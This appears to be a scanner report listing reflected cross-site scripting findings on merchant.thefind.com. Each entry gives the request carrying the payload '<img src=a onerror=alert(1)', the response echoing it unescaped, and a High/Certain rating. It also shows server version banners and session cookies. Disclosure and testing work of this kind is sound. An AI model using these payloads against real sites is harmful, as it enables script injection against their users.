GET /css/mcc7129<img%20src%3da Host: merchant.thefind.com Connection: keep-alive Referer: https://merchant.thefind Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __qca=P0-486391256 |
HTTP/1.1 200 OK Date: Tue, 08 Mar 2011 11:56:34 GMT Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8 X-Powered-By: PHP/5.2.0-8+etch15 Expires: Tue, 23 Feb 1999 18:30:00 GMT Cache-Control: must-revalidate, no-cache, no-store, private, s-maxage=0, pre-check=0, post-check=0, max-age=0 Last-Modified: Thu, 03 Mar 2011 05:12:24 GMT Content-Language: en Vary: User-Agent,Accept Status: 200 OK Content-Length: 85 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/html; charset=utf-8 [Could not find component: css.mcc7129<img src=a onerror=alert(1) |
Severity: | High |
Confidence: | Certain |
Host: | https://merchant.thefind |
Path: | /css/mc/layout.css |
GET /css/mc/b320b<img%20src%3da Host: merchant.thefind.com Connection: keep-alive Referer: https://merchant.thefind Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __qca=P0-486391256 |
HTTP/1.1 200 OK Date: Tue, 08 Mar 2011 11:56:50 GMT Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8 X-Powered-By: PHP/5.2.0-8+etch15 Expires: Tue, 23 Feb 1999 18:30:00 GMT Cache-Control: must-revalidate, no-cache, no-store, private, s-maxage=0, pre-check=0, post-check=0, max-age=0 Last-Modified: Thu, 03 Mar 2011 05:12:24 GMT Content-Language: en Vary: User-Agent,Accept Status: 200 OK X-Content-Encoded-By: class.Conteg.0.13 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/html; charset=utf-8 Content-Length: 9544 <!DOCTYPE html> <html xmlns="http://www.w3.org <head> <title>Merchant Center-TheFind.com - Shopping Search Reinvented - What can we find ...[SNIP]... <div id="tf_container"> [Could not find component: css.mc.b320b<img src=a onerror=alert(1) </div> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | https://merchant.thefind |
Path: | /css/mc/mc_common.css |
GET /cssc5aea<img%20src%3da Host: merchant.thefind.com Connection: keep-alive Referer: https://merchant.thefind Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __qca=P0-486391256 |
HTTP/1.1 200 OK Date: Tue, 08 Mar 2011 11:56:32 GMT Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8 X-Powered-By: PHP/5.2.0-8+etch15 Expires: Tue, 23 Feb 1999 18:30:00 GMT Cache-Control: must-revalidate, no-cache, no-store, private, s-maxage=0, pre-check=0, post-check=0, max-age=0 Last-Modified: Thu, 03 Mar 2011 05:12:24 GMT Content-Language: en Vary: User-Agent,Accept Status: 200 OK Content-Length: 88 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/html; charset=utf-8 [Could not find component: cssc5aea<img src=a onerror=alert(1) |
Severity: | High |
Confidence: | Certain |
Host: | https://merchant.thefind |
Path: | /css/mc/mc_common.css |
GET /css/mcf6269<img%20src%3da Host: merchant.thefind.com Connection: keep-alive Referer: https://merchant.thefind Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __qca=P0-486391256 |
HTTP/1.1 200 OK Date: Tue, 08 Mar 2011 11:56:48 GMT Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8 X-Powered-By: PHP/5.2.0-8+etch15 Expires: Tue, 23 Feb 1999 18:30:00 GMT Cache-Control: must-revalidate, no-cache, no-store, private, s-maxage=0, pre-check=0, post-check=0, max-age=0 Last-Modified: Thu, 03 Mar 2011 05:12:24 GMT Content-Language: en Vary: User-Agent,Accept Status: 200 OK Content-Length: 88 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/html; charset=utf-8 [Could not find component: css.mcf6269<img src=a onerror=alert(1) |
Severity: | High |
Confidence: | Certain |
Host: | https://merchant.thefind |
Path: | /css/mc/mc_common.css |
GET /css/mc/bd8fd<img%20src%3da Host: merchant.thefind.com Connection: keep-alive Referer: https://merchant.thefind Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __qca=P0-486391256 |
HTTP/1.1 200 OK Date: Tue, 08 Mar 2011 11:57:17 GMT Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8 X-Powered-By: PHP/5.2.0-8+etch15 Expires: Tue, 23 Feb 1999 18:30:00 GMT Cache-Control: must-revalidate, no-cache, no-store, private, s-maxage=0, pre-check=0, post-check=0, max-age=0 Last-Modified: Thu, 03 Mar 2011 05:12:24 GMT Content-Language: en Vary: User-Agent,Accept Status: 200 OK X-Content-Encoded-By: class.Conteg.0.13 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/html; charset=utf-8 Content-Length: 9544 <!DOCTYPE html> <html xmlns="http://www.w3.org <head> <title>Merchant Center-TheFind.com - Shopping Search Reinvented - What can we find ...[SNIP]... <div id="tf_container"> [Could not find component: css.mc.bd8fd<img src=a onerror=alert(1) </div> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | https://merchant.thefind |
Path: | /css/ui/infobox.css |
GET /css65f67<img%20src%3da Host: merchant.thefind.com Connection: keep-alive Referer: https://merchant.thefind Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __qca=P0-486391256 |
HTTP/1.1 200 OK Date: Tue, 08 Mar 2011 11:57:11 GMT Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8 X-Powered-By: PHP/5.2.0-8+etch15 Expires: Tue, 23 Feb 1999 18:30:00 GMT Cache-Control: must-revalidate, no-cache, no-store, private, s-maxage=0, pre-check=0, post-check=0, max-age=0 Last-Modified: Thu, 03 Mar 2011 05:12:24 GMT Content-Language: en Vary: User-Agent,Accept Status: 200 OK Content-Length: 86 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/html; charset=utf-8 [Could not find component: css65f67<img src=a onerror=alert(1) |
Severity: | High |
Confidence: | Certain |
Host: | https://merchant.thefind |
Path: | /css/ui/infobox.css |
GET /css/uibde46<img%20src%3da Host: merchant.thefind.com Connection: keep-alive Referer: https://merchant.thefind Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __qca=P0-486391256 |
HTTP/1.1 200 OK Date: Tue, 08 Mar 2011 11:58:01 GMT Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8 X-Powered-By: PHP/5.2.0-8+etch15 Expires: Tue, 23 Feb 1999 18:30:00 GMT Cache-Control: must-revalidate, no-cache, no-store, private, s-maxage=0, pre-check=0, post-check=0, max-age=0 Last-Modified: Thu, 03 Mar 2011 05:12:24 GMT Content-Language: en Vary: User-Agent,Accept Status: 200 OK Content-Length: 86 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/html; charset=utf-8 [Could not find component: css.uibde46<img src=a onerror=alert(1) |
Severity: | High |
Confidence: | Certain |
Host: | https://merchant.thefind |
Path: | /css/ui/infobox.css |
GET /css/ui/314e0<img%20src%3da Host: merchant.thefind.com Connection: keep-alive Referer: https://merchant.thefind Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __qca=P0-486391256 |
HTTP/1.1 200 OK Date: Tue, 08 Mar 2011 11:58:52 GMT Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8 X-Powered-By: PHP/5.2.0-8+etch15 Expires: Tue, 23 Feb 1999 18:30:00 GMT Cache-Control: must-revalidate, no-cache, no-store, private, s-maxage=0, pre-check=0, post-check=0, max-age=0 Last-Modified: Thu, 03 Mar 2011 05:12:24 GMT Content-Language: en Vary: User-Agent,Accept Status: 200 OK X-Content-Encoded-By: class.Conteg.0.13 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/html; charset=utf-8 Content-Length: 9543 <!DOCTYPE html> <html xmlns="http://www.w3.org <head> <title>Merchant Center-TheFind.com - Shopping Search Reinvented - What can we find ...[SNIP]... <div id="tf_container"> [Could not find component: css.ui.314e0<img src=a onerror=alert(1) </div> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | https://merchant.thefind |
Path: | /css/utils/ui.css |
GET /cssa40e8<img%20src%3da Host: merchant.thefind.com Connection: keep-alive Referer: https://merchant.thefind Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __qca=P0-486391256 |
HTTP/1.1 200 OK Date: Tue, 08 Mar 2011 11:56:17 GMT Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8 X-Powered-By: PHP/5.2.0-8+etch15 Expires: Tue, 23 Feb 1999 18:30:00 GMT Cache-Control: must-revalidate, no-cache, no-store, private, s-maxage=0, pre-check=0, post-check=0, max-age=0 Last-Modified: Thu, 03 Mar 2011 05:12:24 GMT Content-Language: en Vary: User-Agent,Accept Status: 200 OK Content-Length: 84 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/html; charset=utf-8 [Could not find component: cssa40e8<img src=a onerror=alert(1) |
Severity: | High |
Confidence: | Certain |
Host: | https://merchant.thefind |
Path: | /css/utils/ui.css |
GET /css/utils32f84<img%20src%3da Host: merchant.thefind.com Connection: keep-alive Referer: https://merchant.thefind Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __qca=P0-486391256 |
HTTP/1.1 200 OK Date: Tue, 08 Mar 2011 11:56:33 GMT Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8 X-Powered-By: PHP/5.2.0-8+etch15 Expires: Tue, 23 Feb 1999 18:30:00 GMT Cache-Control: must-revalidate, no-cache, no-store, private, s-maxage=0, pre-check=0, post-check=0, max-age=0 Last-Modified: Thu, 03 Mar 2011 05:12:24 GMT Content-Language: en Vary: User-Agent,Accept Status: 200 OK Content-Length: 83 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/html; charset=utf-8 [Could not find component: css.utils32f84<img src=a onerror=alert(1) |
Severity: | High |
Confidence: | Certain |
Host: | https://merchant.thefind |
Path: | /css/utils/ui.css |
GET /css/utils/c0fe6<img%20src%3da Host: merchant.thefind.com Connection: keep-alive Referer: https://merchant.thefind Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __qca=P0-486391256 |
HTTP/1.1 200 OK Date: Tue, 08 Mar 2011 11:56:49 GMT Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8 X-Powered-By: PHP/5.2.0-8+etch15 Expires: Tue, 23 Feb 1999 18:30:00 GMT Cache-Control: must-revalidate, no-cache, no-store, private, s-maxage=0, pre-check=0, post-check=0, max-age=0 Last-Modified: Thu, 03 Mar 2011 05:12:24 GMT Content-Language: en Vary: User-Agent,Accept Status: 200 OK X-Content-Encoded-By: class.Conteg.0.13 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/html; charset=utf-8 Content-Length: 9547 <!DOCTYPE html> <html xmlns="http://www.w3.org <head> <title>Merchant Center-TheFind.com - Shopping Search Reinvented - What can we find ...[SNIP]... <div id="tf_container"> [Could not find component: css.utils.c0fe6<img src=a onerror=alert(1) </div> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | https://merchant.thefind |
Path: | /favicon.ico |
GET /d2797<img%20src%3da Host: merchant.thefind.com Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __qca=P0-486391256 |
HTTP/1.1 200 OK Date: Tue, 08 Mar 2011 11:55:18 GMT Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8 X-Powered-By: PHP/5.2.0-8+etch15 Expires: Tue, 23 Feb 1999 18:30:00 GMT Cache-Control: must-revalidate, no-cache, no-store, private, s-maxage=0, pre-check=0, post-check=0, max-age=0 Last-Modified: Thu, 03 Mar 2011 05:12:24 GMT Content-Language: en Vary: User-Agent,Accept Status: 200 OK X-Content-Encoded-By: class.Conteg.0.13 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/html; charset=utf-8 Content-Length: 9537 <!DOCTYPE html> <html xmlns="http://www.w3.org <head> <title>Merchant Center-TheFind.com - Shopping Search Reinvented - What can we find ...[SNIP]... <div id="tf_container"> [Could not find component: d2797<img src=a onerror=alert(1) </div> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | https://merchant.thefind |
Path: | /mc/MerchantProgram.fhtml |
GET /mcb5036<img%20src%3da Host: merchant.thefind.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Date: Tue, 08 Mar 2011 11:16:27 GMT Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8 X-Powered-By: PHP/5.2.0-8+etch15 Set-Cookie: flsid=0b4b981bb9356c Expires: Tue, 23 Feb 1999 18:30:00 GMT Cache-Control: must-revalidate, no-store, private, s-maxage=0, pre-check=0, post-check=0, max-age=0 Last-Modified: Thu, 03 Mar 2011 05:12:24 GMT Set-Cookie: fl-uid=73d07e040ac85 Content-Language: en Vary: Accept-Encoding Status: 200 OK Content-Length: 9566 Connection: close Content-Type: text/html; charset=utf-8 <!DOCTYPE html> <html xmlns="http://www.w3.org <head> <title>Merchant Center-TheFind.com - Shopping Search Reinvented - What can we find ...[SNIP]... <div id="tf_container"> [Could not find component: mcb5036<img src=a onerror=alert(1) </div> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | https://merchant.thefind |
Path: | /mc/MerchantProgram.fhtml |
GET /mc/b043a<img%20src%3da Host: merchant.thefind.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Date: Tue, 08 Mar 2011 11:16:52 GMT Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8 X-Powered-By: PHP/5.2.0-8+etch15 Set-Cookie: flsid=6997ae4312fc77 Expires: Tue, 23 Feb 1999 18:30:00 GMT Cache-Control: must-revalidate, no-store, private, s-maxage=0, pre-check=0, post-check=0, max-age=0 Last-Modified: Thu, 03 Mar 2011 05:12:24 GMT Set-Cookie: fl-uid=bfa3e7209f5ea Content-Language: en Vary: Accept-Encoding Status: 200 OK Content-Length: 9540 Connection: close Content-Type: text/html; charset=utf-8 <!DOCTYPE html> <html xmlns="http://www.w3.org <head> <title>Merchant Center-TheFind.com - Shopping Search Reinvented - What can we find ...[SNIP]... <div id="tf_container"> [Could not find component: mc.b043a<img src=a onerror=alert(1) </div> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | https://merchant.thefind |
Path: | /mc/a |
GET /mccce1a<img%20src%3da Host: merchant.thefind.com Connection: keep-alive Referer: https://merchant.thefind Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __qca=P0-486391256 |
HTTP/1.1 200 OK Date: Tue, 08 Mar 2011 11:55:30 GMT Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8 X-Powered-By: PHP/5.2.0-8+etch15 Expires: Tue, 23 Feb 1999 18:30:00 GMT Cache-Control: must-revalidate, no-cache, no-store, private, s-maxage=0, pre-check=0, post-check=0, max-age=0 Last-Modified: Thu, 03 Mar 2011 05:12:24 GMT Content-Language: en Vary: User-Agent,Accept Status: 200 OK X-Content-Encoded-By: class.Conteg.0.13 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/html; charset=utf-8 Content-Length: 9541 <!DOCTYPE html> <html xmlns="http://www.w3.org <head> <title>Merchant Center-TheFind.com - Shopping Search Reinvented - What can we find ...[SNIP]... <div id="tf_container"> [Could not find component: mccce1a<img src=a onerror=alert(1) </div> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | https://merchant.thefind |
Path: | /mc/a |
GET /mc/abdadf<img%20src%3da Host: merchant.thefind.com Connection: keep-alive Referer: https://merchant.thefind Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __qca=P0-486391256 |
HTTP/1.1 200 OK Date: Tue, 08 Mar 2011 11:55:46 GMT Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8 X-Powered-By: PHP/5.2.0-8+etch15 Expires: Tue, 23 Feb 1999 18:30:00 GMT Cache-Control: must-revalidate, no-cache, no-store, private, s-maxage=0, pre-check=0, post-check=0, max-age=0 Last-Modified: Thu, 03 Mar 2011 05:12:24 GMT Content-Language: en Vary: User-Agent,Accept Status: 200 OK X-Content-Encoded-By: class.Conteg.0.13 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/html; charset=utf-8 Content-Length: 9541 <!DOCTYPE html> <html xmlns="http://www.w3.org <head> <title>Merchant Center-TheFind.com - Shopping Search Reinvented - What can we find ...[SNIP]... <div id="tf_container"> [Could not find component: mc.abdadf<img src=a onerror=alert(1) </div> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | https://merchant.thefind |
Path: | /scripts/mc/calendar.js |
GET /scriptse34c5<img%20src%3da Host: merchant.thefind.com Connection: keep-alive Referer: https://merchant.thefind Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __qca=P0-486391256 |
HTTP/1.1 200 OK Date: Tue, 08 Mar 2011 11:57:16 GMT Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8 X-Powered-By: PHP/5.2.0-8+etch15 Expires: Tue, 23 Feb 1999 18:30:00 GMT Cache-Control: must-revalidate, no-cache, no-store, private, s-maxage=0, pre-check=0, post-check=0, max-age=0 Last-Modified: Thu, 03 Mar 2011 05:12:24 GMT Content-Language: en Vary: Accept-Encoding Status: 200 OK Content-Length: 208 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: application/javascript; charset=utf-8 {"flsid":"6997ae4312 |
Severity: | High |
Confidence: | Certain |
Host: | https://merchant.thefind |
Path: | /scripts/mc/calendar.js |
GET /scripts/mc37251<img%20src%3da Host: merchant.thefind.com Connection: keep-alive Referer: https://merchant.thefind Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __qca=P0-486391256 |
HTTP/1.1 200 OK Date: Tue, 08 Mar 2011 11:58:06 GMT Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8 X-Powered-By: PHP/5.2.0-8+etch15 Expires: Tue, 23 Feb 1999 18:30:00 GMT Cache-Control: must-revalidate, no-cache, no-store, private, s-maxage=0, pre-check=0, post-check=0, max-age=0 Last-Modified: Thu, 03 Mar 2011 05:12:24 GMT Content-Language: en Vary: Accept-Encoding Status: 200 OK Content-Length: 208 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: application/javascript; charset=utf-8 {"flsid":"6997ae4312 |
Severity: | High |
Confidence: | Certain |
Host: | https://merchant.thefind |
Path: | /scripts/mc/calendar.js |
GET /scripts/mc/d011a<img%20src%3da Host: merchant.thefind.com Connection: keep-alive Referer: https://merchant.thefind Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __qca=P0-486391256 |
HTTP/1.1 200 OK Date: Tue, 08 Mar 2011 11:58:57 GMT Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8 X-Powered-By: PHP/5.2.0-8+etch15 Expires: Tue, 23 Feb 1999 18:30:00 GMT Cache-Control: must-revalidate, no-cache, no-store, private, s-maxage=0, pre-check=0, post-check=0, max-age=0 Last-Modified: Thu, 03 Mar 2011 05:12:24 GMT Content-Language: en Vary: User-Agent,Accept Status: 200 OK X-Content-Encoded-By: class.Conteg.0.13 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/html; charset=utf-8 Content-Length: 9548 <!DOCTYPE html> <html xmlns="http://www.w3.org <head> <title>Merchant Center-TheFind.com - Shopping Search Reinvented - What can we find ...[SNIP]... <div id="tf_container"> [Could not find component: scripts.mc.d011a<img src=a onerror=alert(1) </div> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | https://merchant.thefind |
Path: | /scripts/mc/callout.js |
GET /scripts50415<img%20src%3da Host: merchant.thefind.com Connection: keep-alive Referer: https://merchant.thefind Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __qca=P0-486391256 |
HTTP/1.1 200 OK Date: Tue, 08 Mar 2011 11:56:48 GMT Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8 X-Powered-By: PHP/5.2.0-8+etch15 Expires: Tue, 23 Feb 1999 18:30:00 GMT Cache-Control: must-revalidate, no-cache, no-store, private, s-maxage=0, pre-check=0, post-check=0, max-age=0 Last-Modified: Thu, 03 Mar 2011 05:12:24 GMT Content-Language: en Vary: Accept-Encoding Status: 200 OK Content-Length: 206 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: application/javascript; charset=utf-8 {"flsid":"6997ae4312 |
Severity: | High |
Confidence: | Certain |
Host: | https://merchant.thefind |
Path: | /scripts/mc/callout.js |
GET /scripts/mca994d<img%20src%3da Host: merchant.thefind.com Connection: keep-alive Referer: https://merchant.thefind Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __qca=P0-486391256 |
HTTP/1.1 200 OK Date: Tue, 08 Mar 2011 11:57:18 GMT Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8 X-Powered-By: PHP/5.2.0-8+etch15 Expires: Tue, 23 Feb 1999 18:30:00 GMT Cache-Control: must-revalidate, no-cache, no-store, private, s-maxage=0, pre-check=0, post-check=0, max-age=0 Last-Modified: Thu, 03 Mar 2011 05:12:24 GMT Content-Language: en Vary: Accept-Encoding Status: 200 OK Content-Length: 206 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: application/javascript; charset=utf-8 {"flsid":"6997ae4312 |
Severity: | High |
Confidence: | Certain |
Host: | https://merchant.thefind |
Path: | /scripts/mc/callout.js |
GET /scripts/mc/afd28<img%20src%3da Host: merchant.thefind.com Connection: keep-alive Referer: https://merchant.thefind Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __qca=P0-486391256 |
